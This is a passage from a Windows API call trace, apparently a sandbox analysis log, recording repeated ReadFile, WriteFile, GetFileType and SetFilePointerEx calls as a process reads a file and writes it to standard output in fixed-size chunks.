nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] GetFileType (hFile=0x50) returned 0x1 [0227.681] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] GetFileType (hFile=0x50) returned 0x1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.681] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.681] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.681] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.681] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] GetFileType (hFile=0x50) returned 0x1 [0227.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.681] GetFileType (hFile=0x50) returned 0x1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] GetFileType (hFile=0x50) returned 0x1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, 
lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] GetFileType (hFile=0x50) returned 0x1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] GetFileType (hFile=0x50) returned 0x1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] GetFileType (hFile=0x50) returned 0x1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.682] GetFileType (hFile=0x50) returned 0x1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] GetFileType (hFile=0x50) returned 0x1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, 
lpOverlapped=0x0) returned 1 [0227.683] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.683] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.683] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.683] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] GetFileType (hFile=0x50) returned 0x1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] GetFileType (hFile=0x50) returned 0x1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] GetFileType (hFile=0x50) returned 0x1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.683] GetFileType (hFile=0x50) returned 0x1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] GetFileType (hFile=0x50) returned 0x1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] WriteFile (in: hFile=0x50, 
lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] GetFileType (hFile=0x50) returned 0x1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] GetFileType (hFile=0x50) returned 0x1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] GetFileType (hFile=0x50) returned 0x1 [0227.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.684] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.684] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.684] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.684] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.685] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] GetFileType (hFile=0x50) returned 0x1 [0227.685] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0227.685] GetFileType (hFile=0x50) returned 0x1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] GetFileType (hFile=0x50) returned 0x1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] GetFileType (hFile=0x50) returned 0x1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] GetFileType (hFile=0x50) returned 0x1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] GetFileType (hFile=0x50) returned 0x1 [0227.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.685] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 
[0227.686] GetFileType (hFile=0x50) returned 0x1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] GetFileType (hFile=0x50) returned 0x1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.686] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.686] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.686] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.686] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] GetFileType (hFile=0x50) returned 0x1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] GetFileType (hFile=0x50) returned 0x1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] GetFileType (hFile=0x50) returned 0x1 [0227.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.686] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, 
lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] GetFileType (hFile=0x50) returned 0x1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] GetFileType (hFile=0x50) returned 0x1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] GetFileType (hFile=0x50) returned 0x1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] GetFileType (hFile=0x50) returned 0x1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] GetFileType (hFile=0x50) returned 0x1 [0227.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.687] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: 
lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.687] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.688] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.688] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.688] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] GetFileType (hFile=0x50) returned 0x1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] GetFileType (hFile=0x50) returned 0x1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] GetFileType (hFile=0x50) returned 0x1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] GetFileType (hFile=0x50) returned 0x1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] GetFileType (hFile=0x50) returned 0x1 [0227.688] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0227.688] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.688] GetFileType (hFile=0x50) returned 0x1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] GetFileType (hFile=0x50) returned 0x1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] GetFileType (hFile=0x50) returned 0x1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.689] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.689] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.689] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.689] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] 
GetFileType (hFile=0x50) returned 0x1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] GetFileType (hFile=0x50) returned 0x1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.689] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] GetFileType (hFile=0x50) returned 0x1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] GetFileType (hFile=0x50) returned 0x1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] GetFileType (hFile=0x50) returned 0x1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] GetFileType (hFile=0x50) returned 0x1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 
[0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] GetFileType (hFile=0x50) returned 0x1 [0227.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.690] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.691] GetFileType (hFile=0x50) returned 0x1 [0227.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.691] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.691] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.691] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.691] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.691] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.691] GetFileType (hFile=0x50) returned 0x1 [0227.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.691] GetFileType (hFile=0x50) returned 0x1 [0227.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.691] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.694] GetFileType (hFile=0x50) returned 0x1 [0227.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.694] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.694] GetFileType (hFile=0x50) returned 0x1 [0227.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] GetFileType (hFile=0x50) returned 0x1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] GetFileType (hFile=0x50) returned 0x1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] GetFileType (hFile=0x50) returned 0x1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] GetFileType (hFile=0x50) returned 0x1 [0227.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.695] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, 
